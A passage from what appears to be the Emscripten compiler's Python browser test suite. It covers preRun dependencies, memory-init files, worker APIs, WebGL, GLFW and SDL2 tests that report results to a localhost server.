self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', '-s', 'RUNTIME_LINKED_LIBS=[supp.wasm]', '-s', 'EXPORT_ALL'], assert_returncode=76)
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', test_file('browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify=0', '-s', 'EXPORTED_FUNCTIONS=[_one,_two,_three,_four]', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('test_emscripten_async_wget2.cpp', expected='0')
def test_module(self):
self.run_process([EMCC, test_file('browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=[_one,_two]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
@parameterized({
'non-lz4': ([],),
'lz4': (['-s', 'LZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'] + args)
def test_mmap_file(self):
create_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid', 'test.js'))
try_delete(test_file('uuid', 'test.js.map'))
# Now run test in browser
self.btest(test_file('uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(test_file('test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(test_file('webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure=1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(test_file('webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(test_file('html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(test_file('webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest(test_file('test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(test_file('webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure=1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(test_file('webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASYNCIFY'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure=1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
